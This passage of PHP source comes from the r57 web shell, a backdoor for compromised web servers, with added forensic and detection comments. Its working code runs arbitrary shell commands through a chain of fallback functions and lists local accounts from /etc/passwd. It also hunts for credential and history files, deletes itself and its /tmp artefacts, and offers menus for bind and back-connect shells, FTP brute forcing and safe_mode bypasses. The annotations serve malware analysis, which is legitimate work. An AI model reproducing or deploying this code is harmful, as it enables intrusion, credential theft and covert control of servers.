 736  echo in('hidden','mysql_l',0,$_POST['mysql_l']);
 737  echo in('hidden','mysql_p',0,$_POST['mysql_p']);
 738  echo in('hidden','mysql_db',0,$_POST['mysql_db']);
 739  echo in('hidden','cmd',0,'db_query');
 740  echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
 741  echo "</form>";
 742  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
 743  }
 744 if(isset($_GET['delete']))
 745  {
        // Self-removal: deletes the file named by the last path segment of PHP_SELF,
        // resolved against the current working directory - presumably this script itself.
        // NOTE(forensics): after this runs the shell file may no longer be on disk, so web
        // server access logs (requests with a delete parameter) and file-system timelines
        // or backups become the main evidence.
 746    @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
 747  }
 748 if(isset($_GET['tmp']))
 749  {
        // Cleanup: removes seven fixed paths under /tmp, with errors suppressed.
        // NOTE(detection): these file names are host indicators to search for; they are
        // presumably artefacts written by other features of the shell that are not part of
        // this listing excerpt - unverified.
 750    @unlink("/tmp/bdpl");
 751    @unlink("/tmp/back");
 752    @unlink("/tmp/bd");
 753    @unlink("/tmp/bd.c");
 754    @unlink("/tmp/dp");
 755    @unlink("/tmp/dpc");
 756    @unlink("/tmp/dpc.c");
 757  }
 758 if(isset($_GET['phpini']))
 759 {
     // Prints every PHP configuration directive with its local and master value as an
     // HTML table when the phpini query parameter is present, then ends the request.
     // The two helper functions are declared inside this branch; ws() is a helper defined
     // outside this part of the listing.
     // NOTE(detection): the output exposes settings such as disable_functions and
     // open_basedir, i.e. the restrictions that apply to the compromised host.
 760 echo $head;
     // U_value(): renders one setting value as display text - '<i>no value</i>' for an
     // empty value, TRUE/FALSE for booleans, print_r() output for arrays and objects -
     // and passes the result through U_wordwrap().
 761 function U_value($value)
 762  {
 763  if ($value == '') return '<i>no value</i>';
 764  if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
 765  if ($value === null) return 'NULL';
 766  if (@is_object($value)) $value = (array) $value;
 767  if (@is_array($value))
 768  {
 769  @ob_start();
 770  print_r($value);
 771  $value = @ob_get_contents();
 772  @ob_end_clean();
 773  }
 774  return U_wordwrap((string) $value);
 775  }
     // U_wordwrap(): HTML-escapes $str, inserts <wbr /> every 100 characters and then moves
     // any <wbr /> that landed inside an HTML entity to just after that entity.
 776 function U_wordwrap($str)
 777  {
 778  $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
 779  return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
 780  }
 781 if (@function_exists('ini_get_all'))
 782  {
 783  $r = '';
 784  echo '<table width=100%>', '<tr><td bgcolor=#396D95><font face=Verdana size=-2 color=orange><div align=center><b>Directive</b></div></font></td><td bgcolor=#396D95><font face=Verdana size=-2 color=orange><div align=center><b>Local Value</b></div></font></td><td bgcolor=#396D95><font face=Verdana size=-2 color=orange><div align=center><b>Master Value</b></div></font></td></tr>';
 785  foreach (@ini_get_all() as $key=>$value)
 786   {
 787   $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
 788   }
 789  echo $r;
 790  echo '</table>';
 791  }
 792 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
 793 die();
 794 }
 795 if(isset($_GET['cpu']))
 796  {
        // Host reconnaissance view: reads a file, splits each line at ':' and prints the
        // two parts as a table; a placeholder row is shown when the file cannot be read.
        // NOTE(review): the path is the bare name "cpuinfo", resolved against the working
        // directory; a directory prefix may have been lost when the page was extracted -
        // TODO confirm against another copy. $r is appended to without being initialised
        // in this branch. ws() is a helper defined outside this part of the listing.
 797    echo $head;
 798    echo '<table width=100%><tr><td bgcolor=#396D95><div align=center><font face=Verdana size=-2 color=orange><b>CPU</b></font></div></td></tr></table><table width=100%>';
 799    $cpuf = @file("cpuinfo");
 800    if($cpuf)
 801     {
 802       $c = @sizeof($cpuf);
 803       for($i=0;$i<$c;$i++)
 804         {
 805           $info = @explode(":",$cpuf[$i]);
 806           if($info[1]==""){ $info[1]="---"; }
 807           $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
 808         }
 809       echo $r;
 810     }
 811    else
 812     {
 813       echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
 814     }
 815    echo '</table>';
 816    echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
 817    die();
 818  }
 819 if(isset($_GET['mem']))
 820  {
        // Host reconnaissance view with the same structure as the CPU view: reads a file,
        // splits each line at ':' and prints the two parts as a table; a placeholder row
        // is shown when the file cannot be read.
        // NOTE(review): the path is the bare name "meminfo", resolved against the working
        // directory; a directory prefix may have been lost when the page was extracted -
        // TODO confirm against another copy. $r is appended to without being initialised
        // in this branch. ws() is a helper defined outside this part of the listing.
 821    echo $head;
 822    echo '<table width=100%><tr><td bgcolor=#396D95><div align=center><font face=Verdana size=-2 color=orange><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
 823    $memf = @file("meminfo");
 824    if($memf)
 825     {
 826       $c = sizeof($memf);
 827       for($i=0;$i<$c;$i++)
 828         {
 829           $info = explode(":",$memf[$i]);
 830           if($info[1]==""){ $info[1]="---"; }
 831           $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
 832         }
 833       echo $r;
 834     }
 835    else
 836     {
 837       echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
 838     }
 839    echo '</table>';
 840    echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
 841    die();
 842  }
 843 $lang=array(
 844 'ru_text1' =>'??????????? ???????',
 845 'ru_text2' =>'?????????? ?????? ?? ???????',
 846 'ru_text3' =>'????????? ???????',
 847 'ru_text4' =>'??????? ??????????',
 848 'ru_text5' =>'???????? ?????? ?? ??????',
 849 'ru_text6' =>'????????? ????',
 850 'ru_text7' =>'??????',
 851 'ru_text8' =>'???????? ?????',
 852 'ru_butt1' =>'?????????',
 853 'ru_butt2' =>'?????????',
 854 'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
 855 'ru_text10'=>'??????? ????',
 856 'ru_text11'=>'?????? ??? ???????',
 857 'ru_butt3' =>'???????',
 858 'ru_text12'=>'back-connect',
 859 'ru_text13'=>'IP-?????',
 860 'ru_text14'=>'????',
 861 'ru_butt4' =>'?????????',
 862 'ru_text15'=>'???????? ?????? ? ?????????? ???????',
 863 'ru_text16'=>'????????????',
 864 'ru_text17'=>'????????? ????',
 865 'ru_text18'=>'????????? ????',
 866 'ru_text19'=>'Exploits',
 867 'ru_text20'=>'????????????',
 868 'ru_text21'=>'????? ???',
 869 'ru_text22'=>'datapipe',
 870 'ru_text23'=>'????????? ????',
 871 'ru_text24'=>'????????? ????',
 872 'ru_text25'=>'????????? ????',
 873 'ru_text26'=>'????????????',
 874 'ru_butt5' =>'?????????',
 875 'ru_text28'=>'?????? ? safe_mode',
 876 'ru_text29'=>'?????? ????????',
 877 'ru_butt6' =>'???????',
 878 'ru_text30'=>'???????? ?????',
 879 'ru_butt7' =>'???????',
 880 'ru_text31'=>'???? ?? ??????',
 881 'ru_text32'=>'?????????? PHP ????',
 882 'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',
 883 'ru_butt8' =>'?????????',
 884 'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
 885 'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
 886 'ru_text36'=>'???? . ???????',
 887 'ru_text37'=>'?????',
 888 'ru_text38'=>'??????',
 889 'ru_text39'=>'????',
 890 'ru_text40'=>'???? ??????? ???? ??????',
 891 'ru_butt9' =>'????',
 892 'ru_text41'=>'????????? ? ?????',
 893 'ru_text42'=>'?????????????? ?????',
 894 'ru_text43'=>'????????????? ????',
 895 'ru_butt10'=>'?????????',
 896 'ru_butt11'=>'?????????????',
 897 'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
 898 'ru_text45'=>'???? ????????',
 899 'ru_text46'=>'???????? phpinfo()',
 900 'ru_text47'=>'???????? ???????? php.ini',
 901 'ru_text48'=>'???????? ????????? ??????',
 902 'ru_text49'=>'???????? ??????? ? ???????',
 903 'ru_text50'=>'?????????? ? ??????????',
 904 'ru_text51'=>'?????????? ? ??????',
 905 'ru_text52'=>'????? ??? ??????',
 906 'ru_text53'=>'?????? ? ?????',
 907 'ru_text54'=>'????? ?????? ? ??????',
 908 'ru_butt12'=>'?????',
 909 'ru_text55'=>'?????? ? ??????',
 910 'ru_text56'=>'?????? ?? ???????',
 911 'ru_text57'=>'???????/??????? ????/??????????',
 912 'ru_text58'=>'???',
 913 'ru_text59'=>'????',
 914 'ru_text60'=>'??????????',
 915 'ru_butt13'=>'???????/???????',
 916 'ru_text61'=>'???? ??????',
 917 'ru_text62'=>'?????????? ???????',
 918 'ru_text63'=>'???? ??????',
 919 'ru_text64'=>'?????????? ???????',
 920 'ru_text65'=>'???????',
 921 'ru_text66'=>'???????',
 922 'ru_text67'=>'Chown/Chgrp/Chmod',
 923 'ru_text68'=>'???????',
 924 'ru_text69'=>'????????1',
 925 'ru_text70'=>'????????2',
 926 'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
 927 'ru_text72'=>'????? ??? ??????',
 928 'ru_text73'=>'?????? ? ?????',
 929 'ru_text74'=>'?????? ? ??????',
 930 'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
 931 'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
 932 'ru_text80'=>'???',
 933 'ru_text81'=>'????',
 934 'ru_text82'=>'???? ??????',
 935 'ru_text83'=>'?????????? SQL ???????',
 936 'ru_text84'=>'SQL ??????',
 937 'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
 938 'ru_text86'=>'?????????? ????? ? ???????',
 939 'ru_butt14'=>'???????',
 940 'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????',
 941 'ru_text88'=>'FTP-??????:????',
 942 'ru_text89'=>'???? ?? ftp ???????',
 943 'ru_text90'=>'????? ????????',
 944 'ru_text91'=>'???????????? ?',
 945 'ru_text92'=>'??? ?????????',
 946 'ru_text93'=>'FTP',
 947 'ru_text94'=>'FTP-????????',
 948 'ru_text95'=>'?????? ?????????????',
 949 'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',
 950 'ru_text97'=>'????????? ??????????: ',
 951 'ru_text98'=>'??????? ???????????: ',
 952 'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd',
 953 'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',
 954 'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????',
 955 'ru_text102'=>'?????',
 956 'ru_text103'=>'???????? ??????',
 957 'ru_text104'=>'???????? ????? ?? ???????? ????',
 958 'ru_text105'=>'????',
 959 'ru_text106'=>'??',
 960 'ru_text107'=>'????',
 961 'ru_butt15'=>'?????????',
 962 'ru_text108'=>'????? ??????',
 963 'ru_text109'=>'????????',
 964 'ru_text110'=>'??????????',
 965 'ru_text111'=>'SQL-?????? : ????',
 966 'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail',
 967 'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list',
 968 'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body',
 969 /* --------------------------------------------------------------- */
 970 'tur_text1' =>'Komut uygula',
 971 'tur_text2' =>'Server uzerinde komut uygula',
 972 'tur_text3' =>'Komut calistir gulum',
 973 'tur_text4' =>'simdi burdasin',
 974 'tur_text5' =>'Servera dosya yukle',
 975 'tur_text6' =>'Yerel dosya',
 976 'tur_text7' =>'Aliases',
 977 'tur_text8' =>'Select alias',
 978 'tur_butt1' =>'taam gulum :)',
 979 'tur_butt2' =>'y&#252;kle bilader',
 980 'tur_text9' =>'Bind port to /bin/bash',
 981 'tur_text10'=>'Port',
 982 'tur_text11'=>'Password for access',
 983 'tur_butt3' =>'Bind',
 984 'tur_text12'=>'Arka taraf',
 985 'tur_text13'=>'IP',
 986 'tur_text14'=>'Port',
 987 'tur_butt4' =>'Rootlucam baglan lutfen',
 988 'tur_text15'=>'Uzak serverdan dosya yukle',
 989 'tur_text16'=>'Ile',
 990 'tur_text17'=>'Remote file',
 991 'tur_text18'=>'Local file',
 992 'tur_text19'=>'Exploits',
 993 'tur_text20'=>'Kullan',
 994 'tur_text21'=>'&nbsp;yeni isim ver abi',
 995 'tur_text22'=>'datapipe',
 996 'tur_text23'=>'Local port',
 997 'tur_text24'=>'Remote host',
 998 'tur_text25'=>'Remote port',
 999 'tur_text26'=>'Kullan',
1000 'tur_butt5' =>'Calistir',
1001 'tur_text28'=>'Su anki durum safe_mode',
1002 'tur_text29'=>'ACCESS DENIED',
1003 'tur_butt6' =>'d&#252;zenle bilader',
1004 'tur_text30'=>'Cat file',
1005 'tur_butt7' =>'bakabilirmiyim abi',
1006 'tur_text31'=>'&#246;yle bi dosya yok bilader',
1007 'tur_text32'=>'Eval PHP code',
1008 'tur_text33'=>'Test bypass open_basedir with cURL functions',
1009 'tur_butt8' =>'Test',
1010 'tur_text34'=>'Test bypass safe_mode with include function',
1011 'tur_text35'=>'Test bypass safe_mode with load file in mysql',
1012 'tur_text36'=>'Database . Tablo',
1013 'tur_text37'=>'Giris',
1014 'tur_text38'=>'Sifre',
1015 'tur_text39'=>'Database',
1016 'tur_text40'=>'Bosaltilacak database tablosu',
1017 'tur_butt9' =>'Bosalt',
1018 'tur_text41'=>'Bosaltilan dosyayi kaydet',
1019 'tur_text42'=>'Dosyalari duzenle',
1020 'tur_text43'=>'Dosya duzenle',
1021 'tur_butt10'=>'taam basabiliriz :)',
1022 'tur_text44'=>'malesef gulum! sansina kus!',
1023 'tur_text45'=>'taam bilader kaydettim',
1024 'tur_text46'=>'Goster phpinfo()',
1025 'tur_text47'=>'Degiskenleri goster php.ini',
1026 'tur_text48'=>'Temp doslarini sil',
1027 'tur_butt11'=>'duzenle abi',
1028 'tur_text49'=>'Serverdan script sil',
1029 'tur_text50'=>'Islemci bilgisine bak',
1030 'tur_text51'=>'Haf?za bilgisine bak',
1031 'tur_text52'=>'Metin ara',
1032 'tur_text53'=>'In dirs',
1033 'tur_text54'=>'Dosyalarin icinde metin ara',
1034 'tur_butt12'=>'Ara',
1035 'tur_text55'=>'Dosyalarda',
1036 'tur_text56'=>'Hicbirsey :(',
1037 'tur_text57'=>'Yarat/Dosya sil/Dir',
1038 'tur_text58'=>'isim',
1039 'tur_text59'=>'dosya',
1040 'tur_text60'=>'dir',
1041 'tur_butt13'=>'Yarat/Sil',
1042 'tur_text61'=>'Dosya yaratildi',
1043 'tur_text62'=>'Dir created',
1044 'tur_text63'=>'Dosya silindi',
1045 'tur_text64'=>'Dir deleted',
1046 'tur_text65'=>'Yarat',
1047 'tur_text66'=>'Sil',
1048 'tur_text67'=>'Chown/Chgrp/Chmod',
1049 'tur_text68'=>'Komut',
1050 'tur_text69'=>'param1',
1051 'tur_text70'=>'param2',
1052 'tur_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
1053 'tur_text72'=>'Metin icin ara',
1054 'tur_text73'=>'Klasor icin ara',
1055 'tur_text74'=>'Dosyalarin icinde ara',
1056 'tur_text75'=>'* you can use regexp',
1057 'tur_text76'=>'Search text in files via find',
1058 'tur_text80'=>'Type',
1059 'tur_text81'=>'Net',
1060 'tur_text82'=>'Databases',
1061 'tur_text83'=>'SQL da sorgula',
1062 'tur_text84'=>'SQL sor',
1063 'tur_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
1064 'tur_text86'=>'Serverdan dosya indir',
1065 'tur_butt14'=>'Indir',
1066 'tur_text87'=>'Uzak ftp sunucusundan doysa indir',
1067 'tur_text88'=>'FTP-server:port',
1068 'tur_text89'=>'Ftp de dosya',
1069 'tur_text90'=>'Transfer modu',
1070 'tur_text91'=>'Arsivleme',
1071 'tur_text92'=>'without archivation',
1072 'tur_text93'=>'FTP',
1073 'tur_text94'=>'FTP-bruteforce',
1074 'tur_text95'=>'Kullanici listesi',
1075 'tur_text96'=>'Can\'t get users list',
1076 'tur_text97'=>'checked: ',
1077 'tur_text98'=>'success: ',
1078 'tur_text99'=>'* kullanici isimlerinde /etc/passwd for ftp Giris ve sifre',
1079 'tur_text100'=>'Uzak ftp sunucusuna dosya yolla',
1080 'tur_text101'=>'Use reverse (user -> resu) login for password',
1081 'tur_text102'=>'Mail',
1082 'tur_text103'=>'Mail yolla',
1083 'tur_text104'=>'Dosyayi maile yolla',
1084 'tur_text105'=>'To',
1085 'tur_text106'=>'From',
1086 'tur_text107'=>'Subj',
1087 'tur_butt15'=>'Yolla',
1088 'tur_text108'=>'Mail',
1089 'tur_text109'=>'Hide',
1090 'tur_text110'=>'Goster',
1091 'tur_text111'=>'SQL-Server : Port',
1092 'tur_text112'=>'Test bypass safe_mode with function mb_send_mail',
1093 'tur_text113'=>'Test bypass safe_mode, view dir list via imap_list',
1094 'tur_text114'=>'Test bypass safe_mode, view file contest via imap_body',
1095 );
/*
 * Command alias table.
 * The author's original comment here was not ASCII and is mis-encoded on this
 * page (only '?' placeholders survive); presumably it introduced this table.
 *
 * $aliases maps a menu label to a ready-made shell command string. How an
 * entry is selected and executed is outside this excerpt -- presumably via
 * ex(); confirm against the rest of the file.
 *
 * Defender note: the values enumerate SUID/SGID binaries, world-writable
 * paths, configuration and credential-bearing files (.htpasswd, service.pwd,
 * shell and MySQL history, .fetchmailrc) and listening ports. A web-server
 * account spawning these exact find/lsattr/netstat command lines is a useful
 * process-audit detection signal.
 */
$aliases=array(
'find suid files'=>'find / -type f -perm -04000 -ls',
'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
'find config.inc.php files'=>'find / -type f -name config.inc.php',
'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
'find config* files'=>'find / -type f -name "config*"',
'find config* files in current dir'=>'find . -type f -name "config*"',
'find all writable files'=>'find / -type f -perm -2 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories'=>'find /  -type d -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files'=>'find / -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'find all service.pwd files'=>'find / -type f -name service.pwd',
'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
'find all .htpasswd files'=>'find / -type f -name .htpasswd',
'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
'find all .bash_history files'=>'find / -type f -name .bash_history',
'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
'find all .mysql_history files'=>'find / -type f -name .mysql_history',
'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
'list file attributes on a Linux second extended file system'=>'lsattr -va',
'show opened ports'=>'netstat -an | grep -i listen',
// The dashed key is a visual separator entry; its command is a plain listing.
'----------------------------------------------------------------------------------------------------'=>'ls -la'
);
// Reusable HTML fragments for the page layout. None of the strings contains a
// variable or an escape sequence, so single quotes yield the same bytes.

// Section header pieces: title row opener/closer and the outer table opener.
$table_up1  = '<tr><td bgcolor=#396D95><font face=Verdana size=-2><b><div align=center>:: ';
$table_up2  = ' ::</div></b></font></td></tr><tr><td>';
$table_up3  = '<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#396D95>';
$table_end1 = '</td></tr>';

// Small inline decorations (the Wingdings glyph is mis-encoded on this page).
$arrow = ' <font face=Wingdings color=gray>?</font>';
$lb = '<font color=black>[</font>';
$rb = '<font color=black>]</font>';
$font = '<font face=Verdana size=-2>';

// Table and form open/close tags.
$ts = '<table class=table1 width=100% align=center>';
$te = '</table>';
$fs = '<form name=form method=POST>';
$fe = '</form>';
1142 
// "users" handler: when the request carries a `users` query parameter, print
// the account names that get_users() parses from /etc/passwd, then stop.
// Defender note: a GET request with a bare `users` parameter answered by a
// list of local account names is a recognisable trait of this script in
// web-server access logs and response captures.
if(isset($_GET['users']))
 {
 // get_users() returns 0 when /etc/passwd cannot be read; the localized "_text96" message is shown then.
 if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=orange>".$lang[$language.'_text96']."</font></center>"; }
 else
  {
  echo '<center>';
  // Names are written to the page without HTML escaping.
  foreach($users as $user) { echo $user."<br>"; }
  echo '</center>';
  }
 // PHP_SELF goes into the href unquoted and unescaped; die() ends the request here.
 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
 }
1154 
// Working-directory and platform detection.
// The POSTed `dir` value is handed to chdir() unchecked, so the client picks
// the directory that later relative paths and commands are resolved against.
if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
$dir = @getcwd();
$windows = 0;
$unix = 0;
// A drive-letter style path (second character ":") marks Windows; anything else, including an empty $dir, sets $unix.
if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
// Fallback when getcwd() produced nothing: guess from the OS environment variable, then php_uname().
// NOTE(review): $unix is already 1 on this path (set by the else branch above), so a "win" match leaves both flags set.
if(empty($dir))
 {
 $os = getenv('OS');
 if(empty($os)){ $os = php_uname(); }
 if(empty($os)){ $os ="-"; $unix=1; }
 else
    {
    // NOTE(review): eregi() was removed in PHP 7.0; "@" does not suppress the resulting fatal error.
    if(@eregi("^win",$os)) { $windows = 1; }
    else { $unix = 1; }
    }
 }
// "search_text" handler: runs when the POST body carries s_dir, s_text and
// cmd=search_text. It searches files under the posted directories for the
// posted text, prints the matching lines as an HTML table and stops.
// Every input is taken from the request as-is; file names and matched lines
// are written to the page without HTML escaping.
if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
  {
    // $head is defined outside this excerpt (presumably the page header markup).
    echo $head;
    // The extension filter (s_mask) is only applied when the `m` field is also set.
    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
    // (0,0): no whole-word wrapping, case-insensitive match.
    $sr->SearchText(0,0);
    $res = $sr->GetResultFiles();
    $found = $sr->GetMatchesCount();
    // $titles is fetched but not used in this block.
    $titles = $sr->GetTitles();
    $r = "";
    if($found > 0)
    {
      $r .= "<TABLE width=100%>";
      // $res maps file name => (line number => highlighted line).
      foreach($res as $file=>$v)
      {
        $r .= "<TR>";
        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
        // Show backslash separators when the platform was detected as Windows.
        $r .= ($windows)? str_replace("/","\\",$file) : $file;
        // NOTE(review): "</ TD>" is a malformed closing tag in the original markup.
        $r .= "</b></font></ TD>";
        $r .= "</TR>";
        foreach($v as $a=>$b)
        {
          $r .= "<TR>";
          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
          $r .= "</TR>\n";
        }
      }
      $r .= "</TABLE>";
    echo $r;
    }
    else
    {
      // No match: show the localized "_text56" message.
      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
    }
  // PHP_SELF goes into the href unquoted and unescaped; die() ends the request here.
  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  die();
  }
// Command-execution self-test: run `echo abcr57` through ex() and expect "r57"
// at offset 3 of the output. Any other result, including no output at all,
// sets $safe_mode = 1; otherwise $safe_mode is not assigned here.
// Defender note: the literal `echo abcr57` command line is a stable indicator
// to look for in process-creation and audit logs.
if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
// Server banner from the environment, "-" when unavailable.
$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
/**
 * Build a run of HTML non-breaking spaces.
 *
 * @param int $i how many "&nbsp;" entities to produce
 * @return string the entities concatenated
 */
function ws($i)
{
    $entity = "&nbsp;";
    $padding = @str_repeat($entity, $i);
    return $padding;
}
/**
 * Run a shell command and return whatever it printed.
 *
 * Tries exec(), shell_exec(), system() and passthru() in that order, using the
 * first one function_exists() reports, and finally attempts popen(). Every
 * call is "@"-silenced, so failures leave no PHP warning behind.
 *
 * Defender note: this fallback chain is the core of the script. Blocking one
 * of these functions only moves execution to the next branch, so hardening
 * with disable_functions has to cover the whole process-spawning family, and
 * detection is better anchored on the web-server account spawning shell
 * processes than on any single PHP function name.
 *
 * @param string $cfe command line, passed on unmodified
 * @return string captured output; '' when $cfe is empty or no branch ran
 *                (shell_exec() can also hand back null)
 */
function ex($cfe)
{
 $res = '';
 if (!empty($cfe))
 {
  if(function_exists('exec'))
   {
    // exec() fills $res with the output lines; they are re-joined with "\n".
    @exec($cfe,$res);
    $res = join("\n",$res);
   }
  elseif(function_exists('shell_exec'))
   {
    $res = @shell_exec($cfe);
   }
  elseif(function_exists('system'))
   {
    // system() prints directly, so the output is captured through an output buffer.
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
   }
  elseif(function_exists('passthru'))
   {
    // Same buffering trick for passthru().
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
   }
  elseif(@is_resource($f = @popen($cfe,"r")))
  {
   // Last resort: read the pipe in 1024-byte chunks until EOF.
   $res = "";
   while(!@feof($f)) { $res .= @fread($f,1024); }
   @pclose($f);
  }
 }
 return $res;
}
/**
 * List local account names by reading /etc/passwd.
 *
 * Defender note: the account list only needs the file to be readable by the
 * web-server user, which is the default on most Unix systems; elsewhere on
 * this page the interface strings tie a "users list" to FTP brute forcing.
 *
 * @return array|int first ":"-separated field of every line that does not
 *                   start with "#", or 0 when the file cannot be read
 */
function get_users()
{
  $users = array();
  // Not "@"-silenced: an unreadable file raises a PHP warning here.
  $rows=file('/etc/passwd');
  if(!$rows) return 0;
  foreach ($rows as $string)
   {
       $user = @explode(":",$string);
       // Skip commented-out lines; blank lines are not filtered.
       if(substr($string,0,1)!='#') array_push($users,$user[0]);
   }
  return $users;
}
/**
 * Print the "cannot write file" error banner.
 *
 * The message prefix follows the global $language setting: one text for "ru"
 * (mis-encoded on this page), the English text for anything else.
 *
 * @param string $i file name appended to the message (echoed without HTML escaping)
 * @return null
 */
function we($i)
{
    $prefix = ($GLOBALS['language']=="ru")
        ? '??????! ?? ???? ???????? ? ???? '
        : "[-] ERROR! Can't write in file ";
    $banner_open = "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#396D95><font color=orange face=Verdana size=-2><div align=center><b>";
    $banner_close = "</b></div></font></td></tr></table>";
    echo $banner_open.$prefix.$i.$banner_close;
    return null;
}
/**
 * Print the "cannot read file" error banner.
 *
 * The message prefix follows the global $language setting: one text for "ru"
 * (mis-encoded on this page), the English text for anything else.
 *
 * @param string $i file name appended to the message (echoed without HTML escaping)
 * @return null
 */
function re($i)
{
    $prefix = ($GLOBALS['language']=="ru")
        ? '??????! ?? ???? ????????? ???? '
        : "[-] ERROR! Can't read file ";
    $banner_open = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#396D95><font color=orange face=Verdana size=-2><div align=center><b>";
    $banner_close = "</b></div></font></td></tr></table>";
    echo $banner_open.$prefix.$i.$banner_close;
    return null;
}
/**
 * Print the "cannot create" error banner.
 *
 * The message prefix follows the global $language setting: one text for "ru"
 * (mis-encoded on this page), the English text for anything else.
 *
 * @param string $i name appended to the message (echoed without HTML escaping)
 * @return null
 */
function ce($i)
{
    $prefix = ($GLOBALS['language']=="ru")
        ? "?? ??????? ??????? "
        : "Can't create ";
    $banner_open = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#396D95><font color=orange face=Verdana size=-2><div align=center><b>";
    $banner_close = "</b></div></font></td></tr></table>";
